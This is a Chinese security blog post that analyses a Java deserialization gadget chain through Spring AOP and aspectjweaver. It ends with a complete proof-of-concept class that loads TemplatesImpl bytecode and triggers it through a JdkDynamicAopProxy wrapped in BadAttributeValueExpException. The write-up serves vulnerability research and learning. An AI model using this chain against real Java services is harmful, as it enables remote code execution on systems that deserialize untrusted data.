<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#f7f7f4">
<meta name="color-scheme" content="light">

<title>SpringAop链 — CurlySean&#39;s Blog</title>
<meta name="description" content="这里是 CurlySean 的个人技术博客，记录漏洞研究、代码审计与攻防实践，整理可以复现、验证与继续推演的技术细节。">
<link rel="canonical" href="http://curlysean.github.io/2025/09/30/SpringAop%E9%93%BE/">
<link rel="stylesheet" href="/css/style.css">
<script>document.documentElement.classList.add('js')</script>

<meta name="generator" content="Hexo 7.3.0"></head>
<body class="page-type-post">
  <a class="skip-link" href="#main-content">跳至正文</a>
  
<header class="site-header" data-header>
  <div class="site-header__inner frame">
    <a class="brand" href="/" aria-label="CurlySean&#39;s Blog 首页">
      <span class="brand__name">CURLYSEAN</span>
      <span class="brand__suffix">SECURITY NOTES</span>
    </a>
    <nav class="desktop-nav" aria-label="主导航">
      
        <a class="desktop-nav__link" href="/">首页</a>
      
        <a class="desktop-nav__link" href="/archives/">文章</a>
      
        <a class="desktop-nav__link" href="/categories/">分类</a>
      
        <a class="desktop-nav__link" href="/tags/">标签</a>
      
        <a class="desktop-nav__link" href="/about/">关于</a>
      
    </nav>
    <a class="header-cta" href="/archives/">开始阅读 <span aria-hidden="true">↗</span></a>
    <button class="menu-toggle" type="button" aria-expanded="false" aria-controls="mobile-menu" data-menu-toggle>
      <span class="sr-only">打开导航</span>
      <span></span><span></span>
    </button>
  </div>
  <nav class="mobile-nav" id="mobile-menu" aria-label="移动端主导航" data-mobile-menu>
    <div class="frame mobile-nav__inner">
      
        <a class="mobile-nav__link" href="/">
          <span>01</span>首页<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/archives/">
          <span>02</span>文章<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/categories/">
          <span>03</span>分类<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/tags/">
          <span>04</span>标签<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/about/">
          <span>05</span>关于<i aria-hidden="true">↗</i>
        </a>
      
    </div>
  </nav>
</header>

  <main id="main-content">
    
<article class="post-page">
  <header class="post-hero">
    <div class="frame post-hero__grid reveal">
      <div class="post-hero__label">
        <p class="eyebrow">FIELD NOTE / 2025</p>
        
          <a href="/categories/Java/">Java ↗</a>
        
      </div>
      <div class="post-hero__main">
        <h1>SpringAop链</h1>
        
      </div>
    </div>
    <div class="frame post-meta-grid reveal">
      <div><span>发布</span><time datetime="2025-09-30T05:53:26.000Z">2025.09.30</time></div>
      <div><span>更新</span><time datetime="2025-09-30T05:53:26.000Z">2025.09.30</time></div>
      <div><span>阅读</span><strong>17 MIN</strong></div>
      <div><span>标签</span><strong>1</strong></div>
    </div>
  </header>

  <div class="frame post-content-layout">
    <aside class="post-rail">
      <div class="post-rail__inner">
        <p class="eyebrow">ON THIS PAGE</p>
        
          <nav class="toc" aria-label="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#KjsKH"><span class="toc-text">SpringAop链</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#pmSoE"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jl1Fi"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#eXxcm"><span class="toc-text">反序列化链</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#O1Eax"><span class="toc-text">反序列化链分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hinmv"><span class="toc-text">从零开始的构造POC生活</span></a></li></ol></li></ol></li></ol></nav>
        
      </div>
    </aside>
    <div class="article-column">
      <div class="article-body reveal">
        <h1 id="KjsKH">SpringAop链</h1>
<h2 id="pmSoE">前言</h2>
前面学习Hessian反序列化时，发现只有Rome反序列化这一条链是我学习过的，现在来补一补没有学过的链子

<h2 id="jl1Fi">环境搭建</h2>

<p>该链依赖于<code>spring-aop</code>和<code>aspectjweaver</code>两个包，在pom.xml文件中导入以下依赖</p>
<p>或者在springboot的<code>spring-boot-starter-aop</code>中自带这两个依赖</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-aop<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>5.3.19<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.aspectj<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>aspectjweaver<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.9.8<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="eXxcm">反序列化链</h2>
<h3 id="O1Eax">反序列化链分析</h3>

<p>该反序列化链的sink点在<code>AbstractAspectJAdvice#invokeAdviceMethodWithGivenArgs</code>方法中，这里可以看到很标准的反射调用方法的代码，方法、对象、参数都是我们可控的</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757495864312-d1a108e6-576c-40ab-8aae-b64b98871429.png"></p>
<p>但是该类是一个抽象类，我们无法将他实例化，且该方法为<code>protected</code>，我们要找到有个可以调用该方法的地方</p>
<p>我们找到了<code>AspectJAroundAdvice</code>类，他继承了<code>AbstractAspectJAdvice</code>类</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757496625746-3ade82dc-96a2-4de5-b1c9-0e794da11d78.png"></p>
<p>且<code>AspectJAroundAdvice#invoke</code>方法可以调用<code>invokeAdviceMethodWithGivenArgs</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757496615556-849de4c1-583e-4419-948d-2151ca315980.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757496668643-f98672aa-bbda-4ba4-92fd-4583786cab4c.png"></p>
<p><code>AspectJAroundAdvice#invoke</code>接受参数为<code>MethodInvocation</code>，而<code>ReflectiveMethodInvocation#proceed</code>这里调用了<code>invoke</code>方法，interceptorOrInterceptionAdvice可控，同时传入的参数也可以对应上</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757498069099-72d00737-330d-4ff1-ba24-22975c7f10c3.png"></p>
<p><code>ReflectiveMethodInvocation</code>并没有继承<code>Serializable</code>接口，因此需要找到一个实例化的地方</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757499096963-47e47681-85f9-430f-9ebf-e1c54445cfa8.png"></p>
<p>最终在<code>JdkDynamicAopProxy#invoke</code>中找到<code>ReflectiveMethodInvocation</code>的实例化，且调用了<code>proceed</code>方法</p>
<p><code>JdkDynamicAopProxy</code>是一个动态代理，在<strong>调用接口中声明的方法</strong>时，就会触发invoke方法，从而触发我们的payload</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1757498835051-5b7857f9-c4dd-4474-8473-00ca9ccae17b.png"></p>
<h3 id="hinmv">从零开始的构造POC生活</h3>

<p>链尾就是<code>TemplatesImpl</code>动态加载字节码，这里就不多说了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">    <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;target/classes/com/AOP/Calc.class&quot;</span>));</span><br><span class="line">    <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">    setField(templates,<span class="string">&quot;_bytecodes&quot;</span>,<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line">    setField(templates,<span class="string">&quot;_name&quot;</span>,<span class="string">&quot;CurlySean&quot;</span>);</span><br><span class="line">    setField(templates,<span class="string">&quot;_tfactory&quot;</span>,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line">    templates.newTransformer();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>下一步我们就要通过<code>AbstractAspectJAdvice#invokeAdviceMethodWithGivenArgs</code>方法，来调用<code>templates.newTransformer()</code></p>
<p>首先通过反射将<code>SingletonAspectInstanceFactory</code>中的实例改为我们的恶意<code>TemplatesImpl</code>对象，然后传入<code>newTransformer</code>方法和<code>templates</code>实例，来构造<code>AspectJAroundAdvice</code>类，调用<code>invokeAdviceMethodWithGivenArgs</code>即可打通</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;target/classes/com/AOP/Calc.class&quot;</span>));</span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">        setField(templates,<span class="string">&quot;_bytecodes&quot;</span>,<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line">        setField(templates,<span class="string">&quot;_name&quot;</span>,<span class="string">&quot;CurlySean&quot;</span>);</span><br><span class="line">        setField(templates,<span class="string">&quot;_tfactory&quot;</span>,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">//        templates.newTransformer();</span></span><br><span class="line"></span><br><span class="line">        <span class="type">Method</span> <span class="variable">newTransformer</span> <span class="operator">=</span> templates.getClass().getDeclaredMethod(<span class="string">&quot;newTransformer&quot;</span>);</span><br><span class="line">        <span class="type">AspectJExpressionPointcut</span> <span class="variable">aspectJExpressionPointcut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AspectJExpressionPointcut</span>();</span><br><span class="line">        <span class="type">SingletonAspectInstanceFactory</span> <span class="variable">singletonAspectInstanceFactory</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SingletonAspectInstanceFactory</span>(templates.getClass());</span><br><span class="line">        setField(singletonAspectInstanceFactory,<span class="string">&quot;aspectInstance&quot;</span> ,templates);</span><br><span class="line"></span><br><span class="line">        <span class="type">AspectJAroundAdvice</span> <span class="variable">aspectJAroundAdvice</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AspectJAroundAdvice</span>(newTransformer, aspectJExpressionPointcut, singletonAspectInstanceFactory);</span><br><span class="line"></span><br><span class="line">        <span class="type">Method</span> <span class="variable">invokeAdviceMethodWithGivenArgs</span> <span class="operator">=</span> AbstractAspectJAdvice.class.getDeclaredMethod(<span class="string">&quot;invokeAdviceMethodWithGivenArgs&quot;</span>,Object[].class);</span><br><span class="line">        invokeAdviceMethodWithGivenArgs.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        invokeAdviceMethodWithGivenArgs.invoke(aspectJAroundAdvice,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>&#125;);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>想要调用<code>AbstractAspectJAdvice#invokeAdviceMethodWithGivenArgs</code>，我们需要用到<code>AspectJAroundAdvice#invoke</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759202766105-73a582c4-2a5e-429e-a25f-ed4bad328af4.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759202777760-06f83c83-a104-4f37-8125-1f5ec6898aa2.png"></p>
<p>在我们不做其他赋值操作时，我们这里的<code>this.aspectJAdviceMethod.getParameterCount</code>为<code>0</code>，actualArgs就为null，可以成功调用<code>newTransformer</code>无参方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759202484303-f34656c3-636a-4385-ab20-697b90f48bd7.png"></p>
<p>调用<code>AspectJAroundAdvice#invoke</code>需要用到<code>ReflectiveMethodInvocation#proceed</code>方法，其中<code>interceptorsAndDynamicMethodMatchers</code>为我们的可控参数，且<code>invoke</code>方法处传入值的类也符合<code>AspectJAroundAdvice#invoke</code>方法接受参数类型</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759203048512-fd6f9c20-a1ac-41b7-8245-4f491ef33b83.png"></p>
<p>之前我们说到<code>ReflectiveMethodInvocation</code>并没有继承<code>Serializable</code>接口，因此需要<code>JdkDynamicAopProxy#invoke</code>方法，其中<code>chain</code>参数就是我们所需可控的<code>interceptorsAndDynamicMethodMatchers</code>参数</p>
<p>而<code>chain</code>是从<code>this.advised</code>中获取的，因此我们需要对<code>advised</code>参数进行赋值</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759203380083-689ad2fb-f3a0-4924-a82d-93df61476756.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759203494571-c9911d73-35e8-44ef-99ca-f7efe4057585.png"></p>
<p>到这里我们只需要调用动态代理的特定方法，就可以走到<code>JdkDynamicAopProxy#invoke</code>方法中，有一点需要注意的是，在其构造方法中，如果以下两个条件都不满足，则会抛出异常（当然如果我们想打通这条链子的话，是必须要对<code>advised</code>进行赋值的，这里只是说在自行调试过程中的问题）</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759203922695-403971c7-510f-4104-9cfc-689783a27e83.png"></p>
<p>要触发<code>JdkDynamicAopProxy#invoke</code>，就得把<code>JdkDynamicAopProxy</code>作为<code>InvocationHandler</code>去创建一个动态代理</p>
<p>因为<code>JdkDynamicAopProxy</code>代理的是 <code>AdvisedSupport</code>类，因此我们的接口也应该传<code>AdvisedSupport</code>的接口，也就是<code>Advised</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759204238878-960f098b-e18a-43c6-910c-e16b4405c7a5.png"></p>
<p>我们知道在Java 动态代理中，只有接口中声明的方法 被代理调用时，才会触发到代理类的<code>invoke</code>方法，当我尝试调用接口中声明的方法尝试触发反序列化链时方法时，却发现没有成功</p>
<p>主要原因在<code>JdkDynamicAopProxy#invoke</code>中的这个部分，这里的逻辑是：<strong>判断当前是否在不透明代理上调用 Advised 接口的方法</strong></p>
<p>那我们调用<code>Advised</code>接口的方法，就会提前return，不调用又无法触发<code>invoke</code>方法，该怎么解决呢？</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759204682114-cf43ad1d-2e97-4d59-a91e-9d67b9f31ad0.png"></p>
<blockquote>
<p>JDK 动态代理自动处理了 Object 类中的某些方法</p>
<p>虽然 toString() 并不在接口中声明，但 JDK 动态代理机制对以下三个方法进行了特殊处理：toString、hashCode、equals</p>
<p>这三个方法被认为是“基础方法”，代理对象内部做了特殊适配</p>
</blockquote>
<p>因此我们可以使用<code>toString</code>、<code>hashCode</code>、<code>equals</code>三个方法来触发<code>invoke</code>，但是对于<code>equls</code>方法和<code>hashCode</code>方法，也会提前return，因此可以利用的只有<code>toString</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1759210545365-99f5254e-a9e6-4e09-b5cf-83776cb9b386.png"></p>
<p>最终我们的Poc是这样的，可以通过<code>toString</code>直接触发，也可以包装一个readObject反序列化触发</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AopPoc</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;target/classes/com/AOP/Calc.class&quot;</span>));</span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">        setField(templates,<span class="string">&quot;_bytecodes&quot;</span>,<span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytes&#125;);</span><br><span class="line">        setField(templates,<span class="string">&quot;_name&quot;</span>,<span class="string">&quot;CurlySean&quot;</span>);</span><br><span class="line">        setField(templates,<span class="string">&quot;_tfactory&quot;</span>,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">//        templates.newTransformer();</span></span><br><span class="line"></span><br><span class="line">        <span class="type">Method</span> <span class="variable">newTransformer</span> <span class="operator">=</span> templates.getClass().getDeclaredMethod(<span class="string">&quot;newTransformer&quot;</span>);</span><br><span class="line">        <span class="type">AspectJExpressionPointcut</span> <span class="variable">aspectJExpressionPointcut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AspectJExpressionPointcut</span>();</span><br><span class="line">        <span class="type">SingletonAspectInstanceFactory</span> <span class="variable">singletonAspectInstanceFactory</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SingletonAspectInstanceFactory</span>(templates.getClass());</span><br><span class="line">        setField(singletonAspectInstanceFactory,<span class="string">&quot;aspectInstance&quot;</span> ,templates);</span><br><span class="line"></span><br><span class="line">        <span class="type">AspectJAroundAdvice</span> <span class="variable">aspectJAroundAdvice</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AspectJAroundAdvice</span>(newTransformer, aspectJExpressionPointcut, singletonAspectInstanceFactory);</span><br><span class="line"></span><br><span class="line"><span class="comment">//        Method invokeAdviceMethodWithGivenArgs = AbstractAspectJAdvice.class.getDeclaredMethod(&quot;invokeAdviceMethodWithGivenArgs&quot;,Object[].class);</span></span><br><span class="line"><span class="comment">//        invokeAdviceMethodWithGivenArgs.setAccessible(true);</span></span><br><span class="line"><span class="comment">//        invokeAdviceMethodWithGivenArgs.invoke(aspectJAroundAdvice,new Object[]&#123;null&#125;);</span></span><br><span class="line"></span><br><span class="line">        <span class="type">AdvisedSupport</span> <span class="variable">advisedSupport</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AdvisedSupport</span>();</span><br><span class="line">        advisedSupport.addAdvice(aspectJAroundAdvice);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">proxyClass</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;org.springframework.aop.framework.JdkDynamicAopProxy&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">jdkDynamicAopProxyClassConstructor</span> <span class="operator">=</span> proxyClass.getDeclaredConstructor(AdvisedSupport.class);</span><br><span class="line">        jdkDynamicAopProxyClassConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">proxyInstance</span> <span class="operator">=</span> Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Advised.class&#125;, (InvocationHandler) jdkDynamicAopProxyClassConstructor.newInstance(advisedSupport));</span><br><span class="line"></span><br><span class="line"><span class="comment">//        proxyInstance.toString();</span></span><br><span class="line"></span><br><span class="line">        <span class="type">BadAttributeValueExpException</span> <span class="variable">badAttributeValueExpException</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BadAttributeValueExpException</span>(<span class="string">&quot;proxyInstance&quot;</span>);</span><br><span class="line">        setField(badAttributeValueExpException,<span class="string">&quot;val&quot;</span>,proxyInstance);</span><br><span class="line">        serialize(badAttributeValueExpException);</span><br><span class="line">        unserialize(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setField</span><span class="params">(Object obj , String field, Object value)</span> <span class="keyword">throws</span> IllegalAccessException, NoSuchFieldException &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">objClass</span> <span class="operator">=</span> obj.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">objField</span> <span class="operator">=</span> objClass.getDeclaredField(field);</span><br><span class="line">        objField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        objField.set(obj,value);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> Exception</span><br><span class="line">    &#123;</span><br><span class="line">        java.io.<span class="type">FileOutputStream</span> <span class="variable">fos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.FileOutputStream(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line">        java.io.<span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.ObjectOutputStream(fos);</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">        oos.close();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">unserialize</span><span class="params">(String Filename)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException</span><br><span class="line">    &#123;</span><br><span class="line">        java.io.<span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.FileInputStream(Filename);</span><br><span class="line">        java.io.<span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.ObjectInputStream(fis);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> ois.readObject();</span><br><span class="line">        ois.close();</span><br><span class="line">        <span class="keyword">return</span> obj;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>










      </div>
      
        <div class="post-tags" aria-label="文章标签">
          
            <a href="/tags/SpringAop/"># SpringAop</a>
          
        </div>
      
    </div>
  </div>

  <nav class="frame post-navigation" aria-label="相邻文章">
    
      <a href="/2025/11/10/Nacos%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E/">
        <span>← PREVIOUS</span>
        <strong>Nacos历史漏洞</strong>
      </a>
    
    
      <a href="/2025/09/30/Hessian%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
        <span>NEXT →</span>
        <strong>Hessian反序列化</strong>
      </a>
    
  </nav>
</article>

  </main>
  <footer class="site-footer">
  <div class="frame site-footer__inner">
    <div class="site-footer__identity">
      <a href="/">CURLYSEAN</a>
      <span>持续记录，保持验证。</span>
    </div>
    <p class="site-footer__copyright">© 2026 CurlySean</p>
    <nav class="site-footer__links" aria-label="外部链接">
      <a href="https://github.com/CurlySean" target="_blank" rel="noopener">GitHub ↗</a>
      <a href="mailto:5345414e@gmail.com">Email ↗</a>
    </nav>
  </div>
</footer>
<button class="back-to-top" type="button" aria-label="返回顶部" data-back-to-top>↑</button>
<script src="/js/main.js" defer></script>

</body>
</html>
